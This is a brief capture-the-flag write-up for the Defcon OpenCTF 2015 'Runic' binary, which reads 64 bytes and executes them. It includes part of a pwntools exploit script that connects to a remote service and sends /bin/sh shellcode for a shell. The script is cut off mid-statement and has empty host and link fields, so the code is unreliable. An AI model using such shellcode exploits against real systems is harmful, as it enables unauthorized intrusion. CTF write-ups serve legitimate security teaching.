Defcon OpenCTF 2015 - Runic

Below is the main function for Runic:

Runic main

The following events happen:

  • read() of 0x40 bytes (64 bytes)
  • call() to the buffer that was just read into

We can send a max of 64 bytes of shellcode, which is immediately executed.

Final Exploit

The following script simply sends a /bin/sh shellcode, and a shell of ours.

import sys
from pwn import * # pip install --upgrade git+

context(arch='x86', os='linux')

HOST = ''
PORT = 4444

## Example
# r = process('./runic')
r = remote(HOST, PORT)

# Debug process
gdb.attach(r, """
bp 80484fa

shellcode = asm(


For relevant code for this writeup:
git clone